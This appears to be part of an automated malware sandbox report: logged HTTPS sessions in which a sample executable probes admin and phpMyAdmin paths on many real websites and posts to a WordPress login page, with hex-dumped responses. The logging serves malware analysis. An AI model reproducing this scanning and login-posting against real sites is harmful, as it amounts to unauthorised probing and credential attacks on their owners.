                                                                                                                                                                                                    507192.168.2.45301274.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC175OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC456INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72 64 50 72 65 73 73 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:47 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: WordPressUpgrade: h2,h2cConnection: Upgrade, closeLocation: https://


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    508192.168.2.45308395.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC301OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: k8spersistent=1203cc93bf326997096bfdc5c2cf4d3f|11f187638643e13d7bd1963991fac52b; OF=1qiejf8u62psuvsa49d0c1jep6
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC426INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 37 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 65 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 70 72 61 67 6d 61 3a 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved Permanentlydate: Sun, 26 Nov 2023 05:59:47 GMTcontent-type: text/html; charset=utf-8content-length: 0expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0pragma:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    509192.168.2.453186172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC169OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC631INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 65 73 6f 66 74 2e 61 63 61 64 65 6d 79 2f 61 64 6d 69 6e 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:47 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeLocation: https://esoft.academy/adminCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"ur
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC417INData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 7d 0a 20 20 20 20 2e 65 72 72 6f 72 20 7b 63 6f 6c 6f 72 3a 20 23 65 30 30 3b 7d 0a 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 7d 0a 20 20 20 20 68 31 20 7b 66
                                                                                                                                                                                                    Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title><style> body {margin: 20px; font-family: helvetica, sans-serif; max-width: 800px;} .error {color: #e00;} pre {font-size: 16px;} h1 {f
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    510192.168.2.45307118.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC180OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC206INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 61 67 72 69 63 6f 6c 61 2e 63 6f 6d 2e 62 72 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 05:59:47 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rechagricola.com.br/phpMyAdmin/
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    511192.168.2.45323623.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC169OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC928INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 2c 20 70 75 62 6c 69 63 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 45 74 61 67 3a 20 57 2f 22 31 37 30 30 39 37 38 33 38 35 22 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 31 39 20 4e 6f 76 20 31 39 37 38 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenConnection: closeCache-Control: max-age=86400, publicContent-Language: enContent-Type: text/html; charset=UTF-8Etag: W/"1700978385"Expires: Sun, 19 Nov 1978 05:00:00 GMTLast-Modified: Sun, 26 Nov 2023 05:59:45 GMTServ
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC6INData Raw: 34 38 32 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 4820
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1368INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://schema
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1368INData Raw: 69 6f 6e 49 44 3a 76 6f 69 64 20 30 2c 73 61 3a 76 6f 69 64 20 30 2c 71 75 65 75 65 54 69 6d 65 3a 76 6f 69 64 20 30 2c 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 3a 76 6f 69 64 20 30 2c 74 74 47 75 69 64 3a 76 6f 69 64 20 30 2c 75 73 65 72 3a 76 6f 69 64 20 30 2c 61 63 63 6f 75 6e 74 3a 76 6f 69 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20
                                                                                                                                                                                                    Data Ascii: ionID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1368INData Raw: 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 6d 65 74 72 69 63 73 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 61 63 74 69 6f 6e 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d
                                                                                                                                                                                                    Data Ascii: ed:!0,harvestTimeSeconds:10,autoStart:!0},metrics:{enabled:!0,autoStart:!0},page_action:{enabled:!0,harvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0}
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1368INData Raw: 70 3d 22 41 6c 6c 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 3b 66 75 6e 63 74 69 6f 6e 20 68 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 69 66 28 21 67 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30
                                                                                                                                                                                                    Data Ascii: p="All configuration objects require an agent identifier!";function h(e){if(!e)throw new Error(p);if(!g[e])throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1368INData Raw: 2c 45 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 45 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74
                                                                                                                                                                                                    Data Ascii: ,E={};function j(e){if(!e)throw new Error("All runtime objects require an agent identifier!");if(!E[e])throw new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent ident
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1368INData Raw: 3d 3e 61 2c 63 76 3a 28 29 3d 3e 6c 2c 69 53 3a 28 29 3d 3e 6f 2c 69 6c 3a 28 29 3d 3e 72 2c 75 78 3a 28 29 3d 3e 63 2c 76 36 3a 28 29 3d 3e 69 2c 77 31 3a 28 29 3d 3e 75 7d 29 3b 63 6f 6e 73 74 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 21 21 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61
                                                                                                                                                                                                    Data Ascii: =>a,cv:()=>l,iS:()=>o,il:()=>r,ux:()=>c,v6:()=>i,w1:()=>u});const r="undefined"!=typeof window&&!!window.document,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNaviga
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1368INData Raw: 65 73 28 74 29 26 26 28 74 68 69 73 2e 73 68 61 72 65 64 43 6f 6e 74 65 78 74 5b 74 5d 3d 6e 29 7d 29 29 7d 63 61 74 63 68 28 65 29 7b 28 30 2c 72 2e 5a 29 28 22 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 65 64 20 77 68 69 6c 65 20 73 65 74 74 69 6e 67 20 53 68 61 72 65 64 43 6f 6e 74 65 78 74 22 2c 65 29 7d 7d 7d 7d 2c 38 65 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69
                                                                                                                                                                                                    Data Ascii: es(t)&&(this.sharedContext[t]=n)}))}catch(e){(0,r.Z)("An error occured while setting SharedContext",e)}}}},8e3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priori
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC1368INData Raw: 7b 7d 76 61 72 20 67 3d 7b 6f 6e 3a 68 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3a 68 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 72 5b 65 5d 3b 69 66 28 21 6e 29 72 65 74 75 72 6e 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65
                                                                                                                                                                                                    Data Ascii: {}var g={on:h,addEventListener:h,removeEventListener:function(e,t){var n=r[e];if(!n)return;for(var i=0;i<n.length;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.le


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    512192.168.2.452730120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC182OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC530INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 37 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 73 64 36 37 6b 73 70 37 30 67 76 6f 66 6a 63 67 62 76 6d 62 35 76 33 63 65 70 3b 20 65 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 36 2d 4e 6f 76 2d 32 30 32 33 20 30 36 3a 35 39 3a 34 37 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 36 30 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 45 78 70 69 72 65 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:47 GMTTransfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=sd67ksp70gvofjcgbvmb5v3cep; expires=Sun, 26-Nov-2023 06:59:47 GMT; Max-Age=3600; path=/; secure; HttpOnlyExpires
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    513192.168.2.45316245.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:47 UTC382OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=6roekjfukh5didgf2fujkrpg5v
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://engel-firm.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 162
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
